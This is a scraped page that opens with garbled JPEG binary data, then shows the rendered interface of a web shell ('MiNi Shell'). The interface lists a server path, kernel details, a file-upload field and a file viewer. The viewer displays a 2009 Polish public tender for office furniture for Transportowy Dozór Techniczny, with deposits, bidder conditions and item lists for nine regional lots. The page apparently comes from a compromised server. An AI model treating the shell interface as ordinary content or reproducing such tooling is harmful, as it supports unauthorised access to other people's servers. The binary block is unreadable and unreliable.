JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090522/78825-N-2009.html

<p class="kh_header"><b>Warszawa: Dostawa mebli biurowych wraz z montażem dla potrzeb
Transportowego Dozoru Technicznego</b><br>
<b>Numer ogłoszenia: 78825 - 2009; data zamieszczenia: 22.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Transportowy Dozór Techniczny , ul. Chałubińskiego 4, 00-928 Warszawa, woj. mazowieckie, tel. 022 4902902, faks 022 8302222.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.tdt.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli biurowych wraz z montażem dla potrzeb
Transportowego Dozoru Technicznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa mebli biurowych wraz z montażem dla potrzeb Transportowego Dozoru Technicznego i jego Oddziałów na terenie Rzeczpospolitej (Warszawa Biuro, Oddział: w Warszawie, Lublinie,  Krakowie,  Katowicach, Gdańsku, we Wrocławiu, Poznaniu oraz Laboratorium w Krakowie)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium wysokości : część 1 - 300,00 zł..; część 2 - 130,00 zł.; 
część 3 - 10,00 zł.; część 4 - 500,00 zł.; część 5 - 430,00 zł.; część 6 - 250,00 zł.; część 7 - 380,00 zł.;
część 8 - 220,00 zł.;  część 9 - 430,00 zł.;
na rachunek bankowy Zamawiającego:
Citibank Handlowy w Warszawie S.A. ul. Senatorska 16, 00-923 Warszawa
32 1030 1061 0000 0000 5381 2058

1.Wadium należy wnieść przed upływem terminu składania ofert.
2.Wadium może być wnoszone w jednej lub kilku następujących formach:
1)pieniądzu,
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)gwarancjach bankowych,
4)gwarancjach ubezpieczeniowych,
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2000 r. Nr 109, poz. 1158, ze zm.).
3.Zamawiający zwraca niezwłocznie wadium, jeżeli:
1)upłynął termin związania z ofertą,
2)zawarto umowę w sprawie zamówienia publicznego,
3)Zamawiający unieważnił postępowanie o udzielenie zamówienia a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia,
4)Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy:
a)który wycofał ofertę przed upływem terminu składania ofert,
b)który został wykluczony z postępowania,
c)którego oferta została odrzucona,
z zastrzeżeniem art.46 ust. 4a;
Art. 46 ust. 4a Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
4.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Zamawiający informuje, że zgodnie z art. 22 ust. 1 ustawy o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy Prawo zamówień publicznych;
5)po zapoznaniu się z warunkami zamówienia akceptują je bez zastrzeżeń.

2.Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
1)Zamawiający oceni, czy Wykonawca spełnia warunki, o których mowa w ust 1, na podstawie złożonego wraz z ofertą, zgodnie z art. 44 ustawy, oświadczenia o spełnieniu warunków udziału w postępowaniu oraz na podstawie złożonych wraz z ofertą dokumentów żądanych przez Zamawiającego potwierdzających spełnianie tych warunków, o których mowa w § 5 SIWZ.
2)Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca spełnia albo nie spełnia poszczególnych warunków.
3)Jeżeli Wykonawca nie dołączy do oferty wymaganych oświadczeń lub dokumentów lub z treści dołączonych dokumentów nie będzie wynikać, że zostały spełnione warunki określone w pkt 1, to Zamawiający zgodnie z art. 26 ust. 3 ustawy (wzywa wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu, albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania wniosków o dopuszczenie do udziału w postępowaniu albo termin składania ofert..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Na podstawie art. 25 ust. 1 ustawy Zamawiający żąda złożenia aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez osobę uprawnioną osoby uprawnione do reprezentowania Wykonawcy.
2.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 1 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, jak również że nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
3.Dokumenty, o których mowa w ust. 2, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 2, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Terminy wystawienia dokumentów, o których mowa w ust. 3, stosuje się odpowiednio.
5.Wykonawca jest zobowiązany złożyć wraz z ofertą oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art. 44 ustawy - w załączeniu druk oświadczenia - Załącznik nr 3 i Załącznik nr 3 1 do SIWZ.
6.Pełnomocnictwo do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik.
7.Forma dokumentów:
1)dokumenty, o których mowa w ust. 1 do 4 są składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę (do wyboru Wykonawcy - oryginał nie jest wymagany),
2)oświadczenie, o którym mowa w ust. 5 i 6, jest składane w formie oryginału,
3)dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę, w formie określonej w pkt 1..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.tdt.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 00-928 Warszawa, ul. Chałubińskiego 4 - adres wysyłkowy
ul. Chałubińskiego 8, 44 piętro, pok. 64 - osobiście.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2009 godzina 12:00, miejsce: 00-928 Warszawa, ul. Chałubińskiego 4 - adres wysyłkowy
ul. Chałubińskiego 8, 44 piętro, pok. 64 - osobiście.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Transportowy Dozór Techniczny
Biuro
 ul. Chałubińskiego 8
00-928 Warszawa.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Fotel obrotowy siedzisko i oparcie tapicerowane, regulowana wysokość siedziska za pomocą podnośnika pneumatycznego, regulowana wysokość oparcia, 2 podłokietniki	12
Biurko zamykane na klucz z dwoma kontenerami jeden z 4 szufladami drugi z drzwiami	6
Regał metalowy na akta z regulowanymi półkami, półki wykonane z blachy stalowej o grubości min. 1 mm, 6 półek, udźwig półki min. 145 kg, słupy nośne wykonane z kątownika perforowanego, co 20 mm i wyposażone w stopkę z tworzywa, malowane proszkowo	3
Szafa aktowa metalowa, drzwi skrzydłowe ze schowanymi zawiasami, zamykana na zamek ryglujący drzwi w 2 punktach, regulowana wysokość półek, min 4 półki, wykonana z blachy min 0,8mm	11
Nadstawka z półkami dwudrzwiowa zamykana na klucz	9
Wieszaki	2
Szafa ubraniowa (szafa dwudrzwiowa podzielona wewnątrz na dwie części: ubraniową szerokości 55 cm (z wieszakiem i górną półką ) druga część z półkami szerokości 25 cm)	4.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Transportowy Dozór Techniczny
Oddział terenowy
w Warszawie
ul. Królewska 27,
00-060 Warszawa.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szafa metalowa wzmocniona zamykana	1
Metalowe regały biurowe	7
Wieszak	1
Szafa ubraniowa	3
Szafa na akta 3.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Transportowy Dozór Techniczny        
Oddział Terenowy 
w Lublinie
Al. Wincentego Witosa 1,
20-315 Lublin.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Metalowa szafa biurowa 203e. Drzwi skrzydłowe ze schowanymi zawiasami. Uchwyt drzwiowy z zamkiem zabezpieczającym (Rysunek nr 1)	1.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Transportowy Dozór Techniczny
Oddział terenowy w Krakowie
ul. Pocieszka 5
31-408 Kraków.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szafa dwudrzwiowa z nadstawką przeznaczona na przechowywanie segregatorów, wyposażona w zamek ryglowany u góry i na dole, wyposażone w 5 półek.	1
Nadstawka wyposażona w 1 półkę.  Możliwość rozmieszczenia półek w dowolnie regulowanym położeniu.	1
Szafa dwudrzwiowa z nadstawką, przeznaczona na przechowywanie segregatorów, wyposażona w zamek ryglowany u góry i na dole. Szafa wyposażona w 3 półki.	3
Nadstawka wyposażona w 1 półkę.  Możliwość rozmieszczenia półek w dowolnie regulowanym położeniu.	3
Regał z 6 półkami rozmieszczonymi w dowolnie regulowanym położeniu. Regał przeznaczony na przechowywanie segregatorów.	4
Łóżko jednoosobowe z zagłówkiem wyposażone w materac sprężynowy na ramie drewnianej, nóżki drewniane lub metalowe.	4
Szafka nocna (nakastlik).	4
Szafa ubraniowa dwudrzwiowa - połowa, drążek na ubrania z półką wewnętrzną w górnej części, druga połowa 4 półki na ubrania.	2
Toaletka z szafką na milibar.	2
Regały do archiwum.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Transportowy Dozór Techniczny
Oddział terenowy
w Gdańsku
ul. Kętrzyńskiego 24b,
80-376 Gdańsk.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Krzesła obrotowe. Wyposażone w podnośnik pneumatyczny do płynnej regulacji wysokości, regulacja odległości siedziska od oparcia, regulacja kąta nachylenia siedziska względem oparcia, podłokietniki, lekki profil w części lędźwiowej  kręgosłupa, profilowane siedzisko	8
Szafy biurowe na akta 2 drzwiowe zamykane na klucz z 4 półkami  dowolnie regulowanymi	7
Nadstawki na szafy biurowe na akta 2-drzwiowe, w środku półka, zamykane na kluczyk	7
Stoły konferencyjne	7
Szafki pod ladę recepcyjną  - szuflady, zamykane na kluczyk	20
Szafki pod ladę recepcyjną , 1 półka, dolna, ew. możliwość regulowania wysokosci półek , zamykane na kluczyk.	2
Szafki do recepcji z półkami, o wysokości min. 34 cm. , zamykane na kluczyk	2
Szafka do recepcji z Szufladami, zamykane na kluczyk.	2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Transportowy Dozór Techniczny
Oddział terenowy
we Wrocławiu
ul. Joannitów 13,
50-525 Wrocław.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Biurko wykonane z płyty MDF o grubości 18mm, blat o grubości 30 mm, wykończenie Calvados wyposażone w dwie szafki boczne zamykane na klucz. Szafka wyposażona w jedną półkę. Szafka wyposażona w 4 szuflady. Połączenie z szafkami stanowi jednolitą całość.	4
Krzesła obrotowe z wysokim oparciem, regulowana wysokość siedziska, podłokietniki.	2
Krzesła konferencyjne. Oparcie o średniej wysokości, miękkie tapicerowane tkaniną z atestem trudno zapalności. Stelaż metalowy w kolorze czarnym-matowym. Rurka stelaża o przekroju owalnym. Możliwość sztaplowania (układania jedno na drugie) Podłokietnik ze składanym plastikowym pulpitem w kolorze czarnym (wersja dla praworęcznych i leworęcznych)	35
Regał wykonany z płyty MDF o grubości 18mm, wykończenie Calvados  wyposażony w 4 półki zamknięty ścianką z tyłu	2
Regał stalowy na akta *60 kg nośność półki przy równomiernie rozłożonej masie *Nośność regału: do 700 kg *8 pólek na jeden regał
*Półki z trzykrotnym profilowaniem i ogranicznikiem *Wysokość krawędzi półki: 25 mm *Możliwość zmiany wysokości półki co 25 mm *Stabilność regału uzyskana poprzez zastosowanie stężeń diagonalnych *Dodatkowe wyposażenie w postaci bocznych listew zabezpieczających przed wysunięciem dokumentów	10
Wieszak  na ubrania. Wieszak stojący, 6-8 haczyków na jednym wieszaku.	6.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Transportowy Dozór Techniczny
Oddział terenowy w Poznaniu
ul. Grunwaldzka 391,
60-173 Poznań.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Łóżko (rama + materac ze sprężynami kieszeniowymi 90) , do samodzielnego montażu z montażem na miejscu	8 
Szafka nocna (komplet z łóżkiem)	8 
Biurka drewniane - bez półki na klawiaturę, z jednej strony szuflada + szafka, do samodzielnego montażu z montażem na miejscu (Rysunek nr 3)	4 
Szafy ubraniowe dzielona dwudrzwiowe z częścią zawierającą półki po jednej stronie i drążek po drugiej (50 50),do samodzielnego montażu z montażem na miejscu (Rysunek nr 4)	3
Szafa ubraniowa na wymiar (zabudowa wnęki na poddaszu jak na zdjęciu, w załączniku), dwudrzwiowa, drzwi przesuwane 50 50, drążek + półki (Rysunek nr 5)	1 
Krzesło obrotowe -  fotele do pracy przy komputerze na podstawie z pięcioma kółkami, z podłokietnikami o regulowanej wysokość siedziska i kąta oparcia, wyściełane materiałem	8 
Wieszaki - stojący na ubrania drewniany z uchwytami na parasolki	2 
Regały metalowe, 6 półek metalowych o nośności min 140kg półkę, słupy o wymiarach 35x35x2 (kątowniki perforowane z otworami do mocowania półek) -. bez montażu	10
Regały metalowe  , 7 półek metalowych o nośności min 140kg/półkę, słupy o wymiarach 35x35x2 (kątowniki perforowane z otworami do mocowania półek) - bez montażu	5 
Stół kuchenny drewniany	1
Ława narożnikowa tapicerowana (komplet ze stołem)	1
Krzesła drewniane z oparciem (komplet ze stołem)	2
Zestaw wypoczynkowy składający się z sofy dwuosobowej, dwóch foteli i stolika; materiał ekoskóra	
Meble kuchenne - w skład  których wchodzą :szafka z czterema szufladami 40cm (Rysunek nr 6)	1
Szafka dolna 40cm,	1
Szafka + zlewozmywak jednokomorowy z ociekaczem, syfonem i baterią zlewozmywakową	1
Szafka narożna wewnętrzna otwieranie prawe	1
Płyta maskującą z tyłu w kolorze mebli zakrywająca tył szafki  i lodówki	
Blat na szafki dolne grubości 2,8cm zakończony półokręgiem z nogą, który z jednej strony oparty będzie na szafce narożnikowej, jako element tzw. wyspy	
Szafka wisząca witryna 80cm.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Laboratorium TDT
Ul.Pocieszka 5
31-408 Kraków.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Krzesło biurowe o metalowej lakierowanej ramie (koloru czarnego), z miękkim tapicerowanym siedziskiem i oparciem	5
Biurko komputerowe, drzwiczki i szuflady zamykane na kluczyk, szuflada na klawiaturę, nogi aluminiowe-srebrny matowy  (Rysunek nr 7)	2
Stół biurowy, nogi aluminiowe-srebrny matowy	4
Szafa metalowa na akta,5 półek metalowych, zamek z zasuwami. Malowana proszkowo.	4
Szafa na akta, drzwiczki zamykane na kluczyk, 4 półki na segregator A4 (Rysunek nr 8)	4
Nadstawka do szafy na akta (Rysunek nr 8)	4
Wieszak ubraniowy wolnostojący w całości wykonany z drewna	6
Regał warsztatowy, metalowy,5 półek, nośność całkowita 1000kg	4
Szafka metalowa BHP, 2-drzwiowa,dzielona, z półką, wieszakiem na ubrania	2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Transportowy Dozór Techniczny
Oddział terenowy w Katowicach
Al. Roździeń-skiego 1
40-202 Katowice.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szafy wykonane z płyty obustronnie laminowanej, widoczne krawędzie oklejone obrzeżem PCV 1mm. Półki regulowane, na podpórkach o 5mm. Drzwiczki otwierane i zamykane na zamek, w szafach bez przegrody drzwiczki zamykane na zamki baskwilowe.	10

Szafy wykonane z płyty obustronnie laminowanej, widoczne krawędzie oklejone obrzeżem PCV 1mm. Półki regulowane, na podpórkach o 5mm. Drzwiczki otwierane i zamykane na zamek, w szafach bez przegrody drzwiczki zamykane na zamki baskwilowe.	1
Szafy wykonane z płyty obustronnie laminowanej, widoczne krawędzie oklejone obrzeżem PCV 1mm. Półki regulowane, na podpórkach o 5mm. Drzwiczki otwierane i zamykane na zamek, w szafach bez przegrody drzwiczki zamykane na zamki baskwilowe.	4
Szafy wykonane z płyty obustronnie laminowanej, widoczne krawędzie oklejone obrzeżem PCV 1mm. Półki regulowane, na podpórkach o 5mm. Drzwiczki otwierane i zamykane na zamek, w szafach bez przegrody drzwiczki zamykane na zamki baskwilowe.	5
j.w + (podział szaf h=700mm, i 1600mm) 	1
j.w + (podział szaf h=700mm, i 1600mm)	8
j.w + (podział szaf h=700mm, i 1600mm)	1
j.w + (podział szaf h=700mm, i 1900mm)	2
j.w + (podział szaf h=700mm, i 1900mm)	4
j.w + (podział szaf h=800mm, i 1900mm)	1
